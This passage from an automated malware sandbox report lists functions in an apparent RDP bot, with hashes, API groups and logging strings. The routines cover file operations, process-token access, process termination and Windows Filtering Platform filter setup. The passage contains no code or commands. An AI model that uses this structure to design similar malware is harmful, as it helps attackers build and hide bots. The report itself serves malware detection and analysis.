                                                                                                                                                  • Instruction Fuzzy Hash: 43F10713E3C68386FA747755A880778A260EF1CF55FE04132CA0E4A6D2DD5FED8592E2
                                                                                                                                                  Function 00007FF775724D81 Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 226stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$DirectoryErrorLastRemovestrcmpstrcpy$fflushfwrite
                                                                                                                                                  • String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
                                                                                                                                                  • API String ID: 2460052984-4087913290
                                                                                                                                                  • Opcode ID: 8dc65f1aecab8ea4f47efe9ab0ad32aca9d45740e90fa263407e76fd36843b16
                                                                                                                                                  • Instruction ID: b87eb040278318ae487ae60475e25120316f17439628246d5e056c7e5789c760
                                                                                                                                                  • Opcode Fuzzy Hash: 8dc65f1aecab8ea4f47efe9ab0ad32aca9d45740e90fa263407e76fd36843b16
                                                                                                                                                  • Instruction Fuzzy Hash: F8A1A123E3C68285F730BB15A8457F9E3A2EF88B55FE40032D94D4A685EE3CE44587E1
                                                                                                                                                  Function 00007FF7757253BF Relevance: 42.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$strcatstrcpy$strcmp
                                                                                                                                                  • String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
                                                                                                                                                  • API String ID: 2140730755-3699962909
                                                                                                                                                  • Opcode ID: 37f82467a9b4f0f1a8f65e44a39071a822eed56fb51b10aaf508232bd5983809
                                                                                                                                                  • Instruction ID: 1edde6e7e0f830c77f5826b33e03e000c35ddc748fab48dcef79827cf3d3a5f0
                                                                                                                                                  • Opcode Fuzzy Hash: 37f82467a9b4f0f1a8f65e44a39071a822eed56fb51b10aaf508232bd5983809
                                                                                                                                                  • Instruction Fuzzy Hash: 80C18F6393C68691FA24AB11A5443FAE361EF4CF84FD44032DA4D4BA85DF7CE509C7A1
                                                                                                                                                  Function 00007FF775721D60 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 207memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
                                                                                                                                                  • String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
                                                                                                                                                  • API String ID: 3826151639-1775164968
                                                                                                                                                  • Opcode ID: fbc27cd743f1523cf46be9fc6bf3ed102a9720512f7d7819e97c2f17d8ad2cd0
                                                                                                                                                  • Instruction ID: 27ed1adbcb98aea5a3bf6f983fcc7221d857c2180d8578f618ee7d669482c42e
                                                                                                                                                  • Opcode Fuzzy Hash: fbc27cd743f1523cf46be9fc6bf3ed102a9720512f7d7819e97c2f17d8ad2cd0
                                                                                                                                                  • Instruction Fuzzy Hash: 76912A63E3D58281FB606B05EC50779A262FF8CFA6F950032D94E47690DE3DE98583E1
                                                                                                                                                  Function 00007FF77572795A Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
                                                                                                                                                  • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
                                                                                                                                                  • API String ID: 3629392964-1470975255
                                                                                                                                                  • Opcode ID: d61932851ce74b3bb3cf1cb972733808165beb13a36d6ba2616358fc88f4bc17
                                                                                                                                                  • Instruction ID: 193e4f470ef11082defb1a41fe513c98b29d4652ffaac59b2a43437b02d0e7a0
                                                                                                                                                  • Opcode Fuzzy Hash: d61932851ce74b3bb3cf1cb972733808165beb13a36d6ba2616358fc88f4bc17
                                                                                                                                                  • Instruction Fuzzy Hash: 17A1C53362D7C285E7609B25B8403AAB7A5FB85B50F844134EACC4BB99DF3DD484CB90
                                                                                                                                                  Function 00007FF775728153 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 195memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
                                                                                                                                                  • String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
                                                                                                                                                  • API String ID: 2990311666-1793103013
                                                                                                                                                  • Opcode ID: 7da8f20963203a202b6cde00bd6d6d5cb68f077bf040b79e00aef586fafc8510
                                                                                                                                                  • Instruction ID: e855c932889b2cc441cb336e1ba6c527c7e6430c42cea9e72211fb2fad379796
                                                                                                                                                  • Opcode Fuzzy Hash: 7da8f20963203a202b6cde00bd6d6d5cb68f077bf040b79e00aef586fafc8510
                                                                                                                                                  • Instruction Fuzzy Hash: 7B91E52262DBC285F771DB15A84039AB7A1FB85B50F844138EACC4BB99EF3DC544CB90
                                                                                                                                                  Function 00007FF77572405E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                                                  • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                                                  • API String ID: 1104438493-1059260517
                                                                                                                                                  • Opcode ID: 1f30e1d30b345c330644988c5380ee9ae36f7c8538e1076f722eabbeb4c2c8ac
                                                                                                                                                  • Instruction ID: e67ec058cb0185ee374419838b0f89a8278708c668f24f46f855eb1260765d9f
                                                                                                                                                  • Opcode Fuzzy Hash: 1f30e1d30b345c330644988c5380ee9ae36f7c8538e1076f722eabbeb4c2c8ac
                                                                                                                                                  • Instruction Fuzzy Hash: 5D719033E3C28385FB207B16E845BB9A6A2EF5CF54FD41132C94E06691DE2CE945C7A1
                                                                                                                                                  Function 00007FF77572341C Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 187synchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
                                                                                                                                                  • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
                                                                                                                                                  • API String ID: 1879646588-710610406
                                                                                                                                                  • Opcode ID: 1cf9dc9fc7508c57831187bf75e953d7a5889ba14419c8eca060db071c248020
                                                                                                                                                  • Instruction ID: aece65baed010af61c8544b80b52aafe9a2b228f7c725b062d2eeb015eb0e863
                                                                                                                                                  • Opcode Fuzzy Hash: 1cf9dc9fc7508c57831187bf75e953d7a5889ba14419c8eca060db071c248020
                                                                                                                                                  • Instruction Fuzzy Hash: F9812963E3C55F86FA61BB15A4806BCE260EF0CF64F9540B2CC5E57294DE2DAC8583E1
                                                                                                                                                  Function 00007FF775723909 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesErrorFileLast
                                                                                                                                                  • String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
                                                                                                                                                  • API String ID: 1799206407-3397184676
                                                                                                                                                  • Opcode ID: ad5b4c89faa54c5bf45b79fd471cebbced5bf5371ffcee2ccaec2d52fd726c37
                                                                                                                                                  • Instruction ID: 9c8d9dcafe201face2f7add0bc062252af15d7faff56202250db463ef56a9dae
                                                                                                                                                  • Opcode Fuzzy Hash: ad5b4c89faa54c5bf45b79fd471cebbced5bf5371ffcee2ccaec2d52fd726c37
                                                                                                                                                  • Instruction Fuzzy Hash: 22515FA393C65F82F6307B05A8443B8E270FF0DFA8FD44132DA9E06594AE6DA545C3A1
                                                                                                                                                  Function 00007FF775726776 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                                                                                                                                                  • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                                                                                                                                                  • API String ID: 1721699506-2819899730
                                                                                                                                                  • Opcode ID: ed7b55938786d232f4d9094384ec26ffa7b01091c473c9e5d8369086cd487e4c
                                                                                                                                                  • Instruction ID: 2a6b3cf3fb7a24894b9505af4d4517a534aa9cd8b21e5184fc0b3e5f12089a53
                                                                                                                                                  • Opcode Fuzzy Hash: ed7b55938786d232f4d9094384ec26ffa7b01091c473c9e5d8369086cd487e4c
                                                                                                                                                  • Instruction Fuzzy Hash: E1615C63E3C5C791FA20BB54E8043B8A262EB48F54FD58037D94D47A90DE3DE94683E5
                                                                                                                                                  Function 00007FF775721A19 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$Resource$FindLoadfflushfwrite
                                                                                                                                                  • String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
                                                                                                                                                  • API String ID: 2123903355-2019010457
                                                                                                                                                  • Opcode ID: 2bb8962f953552ca7baee075e8185a83bd9eaab00df9a70688943519e183aaa8
                                                                                                                                                  • Instruction ID: 9b4d389e2da09c8236a203c378077c0597d23088636034723fa03558920f39ed
                                                                                                                                                  • Opcode Fuzzy Hash: 2bb8962f953552ca7baee075e8185a83bd9eaab00df9a70688943519e183aaa8
                                                                                                                                                  • Instruction Fuzzy Hash: C0411372A392868AD750EF64E840969B7F0FB4CB64F904136DE5C83794EB3DE544C790
                                                                                                                                                  Function 00007FF7757265E3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen
                                                                                                                                                  • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                                                                                                                                                  • API String ID: 39653677-3302659514
                                                                                                                                                  • Opcode ID: f89d6af64812923fc6faff55ac4fe52c092536c964cfd2e278180fbf8889cd9d
                                                                                                                                                  • Instruction ID: 50fec7ffd485a48090ab3e14a8d00ec3a07cddfb284ac4e832691dc26c512c83
                                                                                                                                                  • Opcode Fuzzy Hash: f89d6af64812923fc6faff55ac4fe52c092536c964cfd2e278180fbf8889cd9d
                                                                                                                                                  • Instruction Fuzzy Hash: C7415B63D386C784FA24BF55A8046B4A261BF48F54FD88133D94D0B695EF3CA906C3E0
                                                                                                                                                  Function 00007FF77572A3E1 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2059824023.00007FF775721000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF775720000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2059807489.00007FF775720000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059845940.00007FF775731000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059860560.00007FF775732000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059876720.00007FF77573A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059889536.00007FF77573C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000006.00000002.2059905414.00007FF77573F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_7ff775720000_vc71izwl68ub3txurufnpr09g6ni3.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Processstrlen$AllocFree
                                                                                                                                                  • String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
                                                                                                                                                  • API String ID: 1318626975-3964590784
                                                                                                                                                  • Opcode ID: 6081a1e7cbb9f0403e3b78aaba03f0aa28fa7ba909b38010743c373d6169abda
                                                                                                                                                  • Instruction ID: f86ef825bd149197edf92f8060c9675d79e51bc410cfb2199a2c0d0116d552ec
                                                                                                                                                  • Opcode Fuzzy Hash: 6081a1e7cbb9f0403e3b78aaba03f0aa28fa7ba909b38010743c373d6169abda
                                                                                                                                                  • Instruction Fuzzy Hash: 9E315F23A38A8785FA21BF15E8043A5B360EF48FA4FE84031DA4D47695DF7CE80583E0
                                                                                                                                                  Function 00007FF775723B64 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
